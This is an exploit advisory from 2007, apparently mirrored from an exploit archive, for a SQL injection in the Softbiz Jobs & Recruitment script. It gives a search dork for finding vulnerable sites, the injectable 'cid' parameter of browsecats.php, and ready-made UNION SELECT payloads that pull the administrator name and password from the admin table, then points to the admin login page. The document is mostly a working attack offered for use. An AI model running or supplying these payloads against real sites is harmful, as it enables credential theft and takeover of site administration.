id: 2208
date: 10/07/2007
title: Softbiz Jobs & Recruitment Remote SQL Injection Vulnerability
author: IRCRASH
cves: 

=============================================================
Softbiz Jobs & Recruitment Remote SQL Injection Vulnerability
=============================================================


#####################################################################################
####              Softbiz Jobs & Recruitment Script SQL INJECTION                ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#Script Download : http://www.softbizscripts.com/                                   #
#DORK: "Powered by SoftbizScripts" "ALL JOBS"                                       #
#                                                                                   #
#                                                                                   #
#                                                                                   #
#Injection Adress : http://site.com/browsecats.php?cid=[sql cod]                    #
#Sql code For see user name : 999999%20union/**/select/**/0,sb_admin_name,2,3/**/from/**/sbjbs_admin/*
#Sql code For see Password : 999999%20union/**/select/**/0,sb_pwd,2,3/**/from/**/sbjbs_admin/*
#                                                                                   #
#Admin panel for login : http://site.com/admin/index.php                            #
#                                                                                   #
#Our site : Ircrash.com                                                             #
#                                                                                   #
#                                                                                   #
#                                 TNX : GOD                                         #
#####################################################################################



#  0day.today [2023-03-27]  #